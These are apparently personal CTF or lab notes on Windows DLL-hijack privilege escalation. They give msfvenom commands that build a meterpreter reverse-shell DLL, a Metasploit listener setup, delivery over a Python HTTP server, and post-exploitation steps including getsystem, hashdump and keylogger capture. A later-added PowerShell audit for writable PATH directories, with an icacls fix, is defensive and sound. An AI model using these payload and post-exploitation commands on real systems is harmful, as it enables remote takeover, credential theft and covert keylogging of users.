# DLL Hijack MSF

## Metasploit Method

### Exploitable service

```
C:\Program Files\DeveloperDebugTools\Service\DeveloperService.exe
```

Write access to this folder, which was in the PATH:

```
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
```

If we can get the evil .dll into that PATH folder and then restart the service (or reboot), it will kick off that .dll with System access!!!

### Create the dll

```
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f dll > /root/data/Debug.dll
```

64-bit option:

```
> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=4444 -f dll > /root/data/Debug.dll
```

### Listener

```
> msfconsole
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set payload windows/x64/meterpreter/reverse_tcp  ..64-bit optional
> set LHOST 10.x.x.x
> set LPORT 4444
> exploit
```

### Copy to Windows

```
> cd data
> python -m SimpleHTTPServer 51001
```

On Windows, browse to `http://10.102.3.116:51001` and download the dll.
Also, after downloading, right-click > Properties > 'Unblock' maybe helped? Works!!

Copy the file here:

```
C:\Program Files (x86)\Common Files\Oracle\Java\javapath
```

Rebooted the Windows Server. This kicked off the service, which ran the evil .dll !!!!!
Watched my "Listener" and picked it up!!!

### Connected!!

```
mtp>> sysinfo
mtp>> getuid
mtp>> cd home
mtp>> pwd
mtp>> cd Desktop

met> sessions -i 1
met> getuid
met> getsystem  --will switch you to system privs
met> screenshot
met> hashdump
met> help   (keylogger, webcam_snap)
met> keyscan_start
met> keyscan_dump   ... shows the keyscan!!

meterpreter > cat flag.txt
```
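Added here as a defensive check, not part of the original notes: a PowerShell audit that lists machine-PATH directories that low-privileged principals can write to, which is the misconfiguration the javapath folder above had. The principal names and access-mask bits are assumptions about a typical Windows install; run it as an administrator on the host being reviewed.

```powershell
# Added example (not from the original notes): find machine-PATH directories
# that low-privileged principals can write to. A SYSTEM service that resolves a
# DLL through PATH will load from such a folder.
$lowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE',
    'Everyone'
)

# Access-mask bits that allow creating or replacing files in a directory:
# FILE_WRITE_DATA, FILE_APPEND_DATA, FILE_DELETE_CHILD, WRITE_DAC, WRITE_OWNER,
# plus GENERIC_WRITE / GENERIC_ALL, which expand to include them.
$writeMask = 0x2 -bor 0x4 -bor 0x40 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

# Services and SYSTEM see the machine PATH; the user PATH does not matter here.
$machinePath = [Environment]::GetEnvironmentVariable('Path', 'Machine')

$findings = foreach ($dir in ($machinePath -split ';' | Where-Object { $_ })) {
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        # A PATH entry that does not exist is also worth flagging: whoever can
        # create it controls what gets loaded from it.
        [pscustomobject]@{ Directory = $dir; Principal = '(missing directory)'; Rights = '' }
        continue
    }
    $acl = Get-Acl -LiteralPath $dir
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        # Cast to int so generic rights (negative enum values) are compared correctly.
        $bits = [int]$ace.FileSystemRights
        if (($bits -band $writeMask) -ne 0) {
            [pscustomobject]@{
                Directory = $dir
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    'No machine-PATH directory grants write rights to low-privileged principals.'
}
```

Remediate a finding by removing the offending grant, for example `icacls "<dir>" /remove:g "BUILTIN\Users"`, or by taking the directory out of the machine PATH.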

* REF: [PrivEscWindows-DLLHijack](/07-win-privesc/win-privesc.md#dll-hijacking)
* <https://pentestlab.blog/2017/04/04/dll-injection/>
* <https://www.greyhathacker.net/?p=738>
* <https://www.gracefulsecurity.com/privesc-dll-hijacking/>
* <https://www.securitynewspaper.com/2016/01/02/dll-hijacking-tutorial/>
* <https://www.youtube.com/watch?v=2l_U4pvaFRg>

## More...

